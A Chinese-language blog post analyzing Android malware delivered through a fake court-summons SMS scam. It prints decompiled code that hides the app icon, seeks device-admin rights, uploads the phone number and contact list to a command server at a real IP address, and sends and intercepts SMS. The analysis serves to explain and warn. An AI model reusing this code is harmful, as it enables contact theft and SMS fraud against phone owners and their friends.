Feeds:
文章
留言

Archive for 六月 8th, 2014

解析 詐騙簡訊App

最近我也常收到 “民事賠償訴訟通知單(台北地院)“詐騙簡訊

20140608

好奇這些App的運作原理。首先

1. 點了簡訊的轉網址是連到 dropbox 的 apk

照理說手機點了應該也不會直接下載才對… 就算下載了應該也不會自動安裝

就算安裝也會顯示奇怪的權限….發送簡訊 <– 有這種權限的 App 基本上都要小心

為什麼會中標了呢?

 

20140608-01

2. 反編譯程式碼, 看有什麼好玩的

https://github.com/cwchiu/sms_virus/

a) 權限 – AndroidManifest.xml

android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED

基本上簡訊已經完全被掌握了….

聯絡人也被抓走,意思是你的朋友也可能收到你寄的詐騙簡訊

聯絡人也會被透過網路取走

最後他也會隨著Android 系統啟動時,自動在背景運作…

b) Activity 進入點 com.example.google.service.MainActivity

b.1) 啟動 com.example.google.service.Services 服務

 private void StartService()
  {
    Intent localIntent = new Intent();
    localIntent.setAction(“com.example.google.service.Services");
    getApplicationContext().startService(localIntent);
  }

b.2) 取得設備管理員權限

private void addAdviceAdmin()
  {
    Intent localIntent = new Intent(android.app.action.ADD_DEVICE_ADMIN);
    localIntent.putExtra(android.app.extra.DEVICE_ADMIN, new ComponentName(“com.example.google.service", “com.example.google.service.MyDeviceAdminReceiver"));
    startActivity(localIntent);
  }

b.3) 隱藏 App Icon

private void HideIcon()
  {
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    setResult(1);
  }

c) 服務, com.example.google.service.Services

c.1) 執行 Repeater.sendUpdateBroadcastRepeat(this);

c.2) Repeater::sendUpdateBroadcastRepeat, 利用 Alarm 服務定時執行 TaskRequest

public class Repeater
{
  public static void sendUpdateBroadcastRepeat(Context paramContext)
  {
    PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, TaskRequest.class), 0);
    long l = SystemClock.elapsedRealtime();
    ((AlarmManager)paramContext.getSystemService(“alarm")).setRepeating(2, l, 40000L, localPendingIntent);
  }
}

c.3) TaskRequest::onReceive, 取得手機號碼, Model, SDK 版號

    this._Context = paramContext;
    if (this._Phone == null)
    {
      this._Phone = Tools.getPhoneNumber(this._Context);
      this._Model = Build.MODEL;
      this._Model = (this._Model + “;" + Build.VERSION.SDK_INT);
    }
    this._Caller = new WebServiceCalling(paramContext);
    SendRequest();

c.4) TaskRequest::SendRequest,

this._Caller.Request(this.taskHandler, this._Phone, this._Model);

c.5) WebServiceCalling::Request(Handler paramHandler, String paramString1, String paramString2) — 後面再說這個 WebServiceCalling

// this.urlRoot
// 定義在 strings.xml 的 Url
callWSSub(paramHandler, 100, this.urlRoot + “SMSHandler1.ashx?t=request&p=" + Uri.encode(paramString1) + “&m=" + Uri.encode(paramString2));

c.6) HttpHelper::callWS(String paramString)

// 送個 HTTP GET
HttpGet localHttpGet = new HttpGet(paramString);
    try
    {
      HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);
      Object localObject = “";
      if (localHttpResponse.getStatusLine().getStatusCode() == 200)
      {
        String str = EntityUtils.toString(localHttpResponse.getEntity());
        localObject = str;
      }
      return localObject;
    }
    catch (Exception localException)
    {
    }
    return “";

c.7) TaskRequest::taskHandler::handleMessage

public void handleMessage(Message paramAnonymousMessage)
    {
      switch (paramAnonymousMessage.what)
      {
      case 3:
      default:
        return;
      case 100:
         // 送出手機號碼
         // http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=手機號碼
        TaskRequest.this.ProcessTasks(paramAnonymousMessage);
        return;
      case 0:
        // 發送簡訊
        new SMSSender(TaskRequest.this._Context).SendSMS(paramAnonymousMessage);
        return;
      case 2:
      }
      // 撈光你的通訊錄
      // 使用 WebServiceCalling::SendContacts
      // http://141.105.65.113/sms/ SMSHandler1.ashx?t=c&p=手機號碼&n=通訊錄資料
      new Contacts(TaskRequest.this._Context).ForwardContacts();
    }
  };

 

d) WebServiceCalling class — 網路服務

// 
// http://141.105.65.113/sms/SMSHandler.ashx?t=c&p=xxx&n=yyy
  public void ForwardContacts(Handler paramHandler, String paramString1, String paramString2)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(this.urlRoot + “SMSHandler.ashx?t=c&p=" + Uri.encode(paramString1) + “&n=" + Uri.encode(paramString2));
  }
//
// http://141.105.65.113/sms/SMSHandler1.ashx?t=l&p=ppp&c=ccc&ty=ooo&l=uuu
  public void Log(String paramString1, String paramString2, String paramString3, String paramString4)
  {
    callWSSub(this.urlRoot + “SMSHandler1.ashx?t=l&p=" + Uri.encode(paramString3) + “&c=" + paramString1 + “&ty=" + paramString2 + “&l=" + Uri.encode(paramString4));
  }
//http://141.105.65.113/sms/SMSHandler1.ashx?t=new
  public void NEWURL()
  {
    String str = this.urlRoot + “SMSHandler1.ashx?t=new";
    System.out.print(str);
    callWSSub(this.Handler_NewUrl, str);
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=xxxx&m=yyy
  public void Request(Handler paramHandler, String paramString1, String paramString2)
  {
    callWSSub(paramHandler, 100, this.urlRoot + “SMSHandler1.ashx?t=request&p=" + Uri.encode(paramString1) + “&m=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=xxx 
  public void Send(Handler paramHandler, String paramString)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(paramHandler, 0, this.urlRoot + “SMSHandler.ashx?t=s&p=" + Uri.encode(paramString));
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=c&p=xxx&n=yyy
  public void SendContacts(String paramString1, String paramString2)
  {
    callWSSub(this.urlRoot + “SMSHandler1.ashx?t=c&p=" + Uri.encode(paramString1) + “&n=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler.ashx?t=stc&p=xxx
  public void SendToContacts(Handler paramHandler, String paramString)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(paramHandler, 3, this.urlRoot + “SMSHandler.ashx?t=stc&p=" + Uri.encode(paramString));
  }

e) SMSReceiver — 簡訊攔截處理

e.1) 檢驗是否為特殊號碼 6279,1232111,mopay,boku,66245,bezahlcode,holyo,55498,55496,33235,46645

e.2) 執行 WebServiceCalling::Forward

 

Read Full Post »